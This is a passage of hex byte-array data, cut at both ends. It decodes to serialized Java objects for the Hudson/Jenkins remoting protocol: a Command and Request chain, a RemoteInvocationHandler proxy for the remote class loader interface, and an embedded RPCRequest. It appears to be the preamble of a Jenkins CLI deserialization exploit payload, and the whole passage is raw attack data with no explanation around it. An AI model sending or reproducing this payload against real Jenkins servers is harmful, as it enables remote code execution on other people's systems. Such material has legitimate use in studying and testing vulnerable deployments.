0x74,0x6f,0x53,0x74,0x72,0x69,0x6e,0x67,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x78,0x72,0x00,0x17,0x68,0x75,\n 0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x03,0x49,0x00,0x02,\n 0x69,0x64,0x49,0x00,0x08,0x6c,0x61,0x73,0x74,0x49,0x6f,0x49,0x64,0x4c,0x00,0x08,0x72,0x65,0x73,0x70,0x6f,0x6e,0x73,0x65,0x74,0x00,0x1a,0x4c,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2f,\n 0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x52,0x65,0x73,0x70,0x6f,0x6e,0x73,0x65,0x3b,0x78,0x72,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,\n 0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x01,0x4c,0x00,0x09,0x63,0x72,0x65,0x61,0x74,0x65,0x64,0x41,0x74,0x74,0x00,\n 0x15,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x3b,0x78,0x70,0x73,0x72,0x00,0x1e,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,\n 0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x24,0x53,0x6f,0x75,0x72,0x63,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x01,0x4c,\n 0x00,0x06,0x74,0x68,0x69,0x73,0x24,0x30,0x74,0x00,0x19,0x4c,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2f,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,\n 0x3b,0x78,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0xd0,0xfd,0x1f,0x3e,0x1a,0x3b,0x1c,0xc4,0x02,0x00,0x00,\n 0x78,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x54,0x68,0x72,0x6f,0x77,0x61,0x62,0x6c,0x65,0xd5,0xc6,0x35,0x27,0x39,0x77,0xb8,0xcb,0x03,0x00,0x04,0x4c,\n 0x00,0x05,0x63,0x61,0x75,0x73,0x65,0x74,0x00,0x15,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x54,0x68,0x72,0x6f,0x77,0x61,0x62,0x6c,0x65,0x3b,0x4c,0x00,0x0d,0x64,\n 0x65,0x74,0x61,0x69,0x6c,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x71,0x00,0x7e,0x00,0x03,0x5b,0x00,0x0a,0x73,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x74,0x00,0x1e,0x5b,0x4c,\n 0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x3b,0x4c,0x00,0x14,0x73,0x75,0x70,0x70,\n 0x72,0x65,0x73,0x73,0x65,0x64,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x73,0x74,0x00,0x10,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x4c,0x69,0x73,0x74,0x3b,\n 0x78,0x70,0x71,0x00,0x7e,0x00,0x10,0x70,0x75,0x72,0x00,0x1e,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,\n 0x6c,0x65,0x6d,0x65,0x6e,0x74,0x3b,0x02,0x46,0x2a,0x3c,0x3c,0xfd,0x22,0x39,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x0c,0x73,0x72,0x00,0x1b,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,\n 0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x61,0x09,0xc5,0x9a,0x26,0x36,0xdd,0x85,0x02,0x00,0x04,0x49,0x00,0x0a,0x6c,\n 0x69,0x6e,0x65,0x4e,0x75,0x6d,0x62,0x65,0x72,0x4c,0x00,0x0e,0x64,0x65,0x63,0x6c,0x61,0x72,0x69,0x6e,0x67,0x43,0x6c,0x61,0x73,0x73,0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x08,0x66,\n 0x69,0x6c,0x65,0x4e,0x61,0x6d,0x65,0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0a,0x6d,0x65,0x74,0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x71,0x00,0x7e,0x00,0x03,0x78,0x70,0x00,0x00,0x00,\n 0x43,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x74,0x00,0x0c,0x43,0x6f,0x6d,0x6d,0x61,\n 0x6e,0x64,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x06,0x3c,0x69,0x6e,0x69,0x74,0x3e,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x32,0x71,0x00,0x7e,0x00,0x15,0x71,0x00,0x7e,0x00,\n 0x16,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x63,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,\n 0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x0c,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,\n 0x00,0x3c,0x74,0x00,0x1b,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x55,0x73,0x65,0x72,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x10,\n 0x55,0x73,0x65,0x72,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x03,0x08,0x74,0x00,0x17,0x68,\n 0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x74,0x00,0x0c,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x2e,0x6a,0x61,\n 0x76,0x61,0x74,0x00,0x04,0x63,0x61,0x6c,0x6c,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0xfa,0x74,0x00,0x27,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,\n 0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x74,0x00,0x1c,0x52,0x65,0x6d,0x6f,0x74,0x65,\n 0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x73,0x71,0x00,0x7e,\n 0x00,0x13,0xff,0xff,0xff,0xff,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x24,0x50,0x72,0x6f,0x78,0x79,0x31,0x70,0x74,0x00,\n 0x0f,0x77,0x61,0x69,0x74,0x46,0x6f,0x72,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x04,0xe7,0x71,0x00,0x7e,0x00,0x20,0x71,0x00,0x7e,0x00,\n 0x21,0x74,0x00,0x15,0x77,0x61,0x69,0x74,0x46,0x6f,0x72,0x52,0x65,0x6d,0x6f,0x74,0x65,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x93,\n 0x74,0x00,0x0e,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x74,0x00,0x08,0x43,0x4c,0x49,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,\n 0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x48,0x74,0x00,0x1f,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,\n 0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x19,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x2e,0x6a,0x61,0x76,0x61,\n 0x74,0x00,0x07,0x63,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0xdf,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x74,0x00,0x05,0x5f,0x6d,\n 0x61,0x69,0x6e,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0x86,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x74,0x00,0x04,0x6d,0x61,0x69,0x6e,0x73,0x72,0x00,0x26,0x6a,\n 0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x4c,0x69,\n 0x73,0x74,0xfc,0x0f,0x25,0x31,0xb5,0xec,0x8e,0x10,0x02,0x00,0x01,0x4c,0x00,0x04,0x6c,0x69,0x73,0x74,0x71,0x00,0x7e,0x00,0x0f,0x78,0x72,0x00,0x2c,0x6a,0x61,0x76,0x61,0x2e,0x75,\n 0x74,0x69,0x6c,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n 0x69,0x6f,0x6e,0x19,0x42,0x00,0x80,0xcb,0x5e,0xf7,0x1e,0x02,0x00,0x01,0x4c,0x00,0x01,0x63,0x74,0x00,0x16,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x43,0x6f,0x6c,\n 0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x3b,0x78,0x70,0x73,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x41,0x72,0x72,0x61,0x79,0x4c,0x69,0x73,0x74,0x78,0x81,\n 0xd2,0x1d,0x99,0xc7,0x61,0x9d,0x03,0x00,0x01,0x49,0x00,0x04,0x73,0x69,0x7a,0x65,0x78,0x70,0x00,0x00,0x00,0x00,0x77,0x04,0x00,0x00,0x00,0x00,0x78,0x71,0x00,0x7e,0x00,0x3c,0x78,\n 0x71,0x00,0x7e,0x00,0x08,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x70,0x73,0x7d,0x00,0x00,0x00,0x02,0x00,0x2e,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,\n 0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x24,0x49,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x00,0x1c,\n 0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x49,0x52,0x65,0x61,0x64,0x52,0x65,0x73,0x6f,0x6c,0x76,0x65,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,\n 0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,0x01,0x68,\n 0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,\n 0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x27,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x49,0x6e,\n 0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x03,0x00,0x05,0x5a,0x00,0x14,0x61,0x75,0x74,0x6f,0x55,0x6e,\n 0x65,0x78,0x70,0x6f,0x72,0x74,0x42,0x79,0x43,0x61,0x6c,0x6c,0x65,0x72,0x5a,0x00,0x09,0x67,0x6f,0x69,0x6e,0x67,0x48,0x6f,0x6d,0x65,0x49,0x00,0x03,0x6f,0x69,0x64,0x5a,0x00,0x09,\n 0x75,0x73,0x65,0x72,0x50,0x72,0x6f,0x78,0x79,0x4c,0x00,0x06,0x6f,0x72,0x69,0x67,0x69,0x6e,0x71,0x00,0x7e,0x00,0x0d,0x78,0x70,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x73,0x71,0x00,\n 0x7e,0x00,0x0b,0x71,0x00,0x7e,0x00,0x43,0x74,0x00,0x78,0x50,0x72,0x6f,0x78,0x79,0x20,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,\n 0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x40,0x32,0x20,0x77,0x61,0x73,0x20,0x63,0x72,0x65,0x61,0x74,0x65,0x64,\n 0x20,0x66,0x6f,0x72,0x20,0x69,0x6e,0x74,0x65,0x72,0x66,0x61,0x63,0x65,0x20,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,\n 0x74,0x65,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x24,0x49,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x75,0x71,0x00,0x7e,0x00,0x11,0x00,0x00,0x00,\n 0x0d,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x7d,0x71,0x00,0x7e,0x00,0x24,0x71,0x00,0x7e,0x00,0x25,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,\n 0x89,0x71,0x00,0x7e,0x00,0x24,0x71,0x00,0x7e,0x00,0x25,0x74,0x00,0x04,0x77,0x72,0x61,0x70,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x02,0x6a,0x71,0x00,0x7e,0x00,0x20,0x71,0x00,\n 0x7e,0x00,0x21,0x74,0x00,0x06,0x65,0x78,0x70,0x6f,0x72,0x74,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x02,0xa6,0x74,0x00,0x21,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,\n 0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x74,0x00,0x16,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x6c,0x61,\n 0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x4a,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x46,0x71,0x00,0x7e,0x00,0x1d,0x71,0x00,\n 0x7e,0x00,0x1e,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x03,0x08,0x71,0x00,0x7e,0x00,0x20,0x71,0x00,0x7e,0x00,0x21,0x71,0x00,0x7e,0x00,0x22,0x73,0x71,\n 0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0xfa,0x71,0x00,0x7e,0x00,0x24,0x71,0x00,0x7e,0x00,0x25,0x71,0x00,0x7e,0x00,0x26,0x73,0x71,0x00,0x7e,0x00,0x13,0xff,0xff,0xff,0xff,0x71,0x00,\n 0x7e,0x00,0x28,0x70,0x71,0x00,0x7e,0x00,0x29,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x04,0xe7,0x71,0x00,0x7e,0x00,0x20,0x71,0x00,0x7e,0x00,0x21,0x71,0x00,0x7e,0x00,0x2b,0x73,\n 0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x93,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x48,0x71,\n 0x00,0x7e,0x00,0x30,0x71,0x00,0x7e,0x00,0x31,0x71,0x00,0x7e,0x00,0x32,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0xdf,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x71,\n 0x00,0x7e,0x00,0x34,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0x86,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x71,0x00,0x7e,0x00,0x36,0x71,0x00,0x7e,0x00,0x3a,0x78,\n 0x78,0x75,0x72,0x00,0x02,0x5b,0x42,0xac,0xf3,0x17,0xf8,0x06,0x08,0x54,0xe0,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x07,0x46,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x68,0x75,0x64,\n 0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,\n 0x72,0x24,0x52,0x50,0x43,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x04,0x49,0x00,0x03,0x6f,0x69,0x64,0x5b,0x00,0x09,0x61,0x72,0x67,\n 0x75,0x6d,0x65,0x6e,0x74,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0a,0x6d,0x65,0x74,0x68,\n 0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x05,0x74,0x79,0x70,0x65,0x73,\n 0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x77,0x08,0xff,0xff,0xff,0xfe,0x00,0x00,0x00,0x02,0x78,0x72,0x00,\n 0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x03,\n 0x49,0x00,0x02,0x69,0x64,0x49,0x00,0x08,0x6c,0x61,0x73,0x74,0x49,0x6f,0x49,0x64,0x4c,0x00,0x08,0x72,0x65,0x73,0x70,0x6f,0x6e,0x73,0x65,0x74,0x00,0x1a,0x4c,0x68,0x75,0x64,0x73,\n 0x6f,0x6e,0x2f,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x52,0x65,0x73,0x70,0x6f,0x6e,0x73,0x65,0x3b,0x77,0x04,0x00,0x00,0x00,0x00,0x78,0x72,0x00,0x17,0x68,0x75,0x64,0x73,\n 0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x01,0x4c,0x00,0x09,0x63,0x72,\n 0x65,0x61,0x74,0x65,0x64,0x41,0x74,0x74,0x00,0x15,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x3b,0x77,0x04,0x00,0x00,\n 0x00,0x00,0x78,0x70,0x73,0x72,0x00,0x1e,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x24,0x53,0x6f,0x75,\n 0x72,0x63,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x01,0x4c,0x00,0x06,0x74,0x68,0x69,0x73,0x24,0x30,0x74,0x00,0x19,0x4c,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2f,0x72,\n 0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x3b,0x77,0x04,0x00,0x00,0x00,0x00,0x78,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n 0x2e,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0xd0,0xfd,0x1f,0x3e,0x1a,0x3b,0x1c,0xc4,0x02,0x00,0x00,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,\n 0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x54,0x68,0x72,0x6f,0x77,0x61,0x62,0x6c,0x65,0xd5,0xc6,0x35,0x27,0x39,0x77,0xb8,0xcb,0x03,0x00,0x04,0x4c,0x00,0x05,0x63,0x61,0x75,0x73,0x65,0x74,\n 0x00,0x15,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x54,0x68,0x72,0x6f,0x77,0x61,0x62,0x6c,0x65,0x3b,0x4c,0x00,0x0d,0x64,0x65,0x74,0x61,0x69,0x6c,0x4d,0x65,0x73,\n 0x73,0x61,0x67,0x65,0x71,0x00,0x7e,0x00,0x02,0x5b,0x00,0x0a,0x73,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x74,0x00,0x1e,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,\n 0x67,0x2f,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x3b,0x4c,0x00,0x14,0x73,0x75,0x70,0x70,0x72,0x65,0x73,0x73,0x65,0x64,0x45,0x78,\n 0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x73,0x74,0x00,0x10,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x4c,0x69,0x73,0x74,0x3b,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,\n 0x71,0x00,0x7e,0x00,0x10,0x70,0x75,0x72,0x00,0x1e,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,\n 0x6d,0x65,0x6e,0x74,0x3b,0x02,0x46,0x2a,0x3c,0x3c,0xfd,0x22,0x39,0x02,0x00,0x00,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x0b,0x73,0x72,0x00,0x1b,0x6a,0x61,0x76,\n 0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x61,0x09,0xc5,0x9a,0x26,0x36,0xdd,0x85,0x02,0x00,0x04,\n 0x49,0x00,0x0a,0x6c,0x69,0x6e,0x65,0x4e,0x75,0x6d,0x62,0x65,0x72,0x4c,0x00,0x0e,0x64,0x65,0x63,0x6c,0x61,0x72,0x69,0x6e,0x67,0x43,0x6c,0x61,0x73,0x73,0x71,0x00,0x7e,0x00,0x02,\n 0x4c,0x00,0x08,0x66,0x69,0x6c,0x65,0x4e,0x61,0x6d,0x65,0x71,0x00,0x7e,0x00,0x02,0x4c,0x00,0x0a,0x6d,0x65,0x74,0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x71,0x00,0x7e,0x00,0x02,0x77,\n 0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x43,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,\n 0x6e,0x64,0x74,0x00,0x0c,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x06,0x3c,0x69,0x6e,0x69,0x74,0x3e,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,\n 0x32,0x71,0x00,0x7e,0x00,0x15,0x71,0x00,0x7e,0x00,0x16,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x63,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,\n 0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x0c,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,\n 0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x02,0x39,0x74,0x00,0x32,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,\n 0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x24,0x52,0x50,0x43,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x1c,0x52,0x65,\n 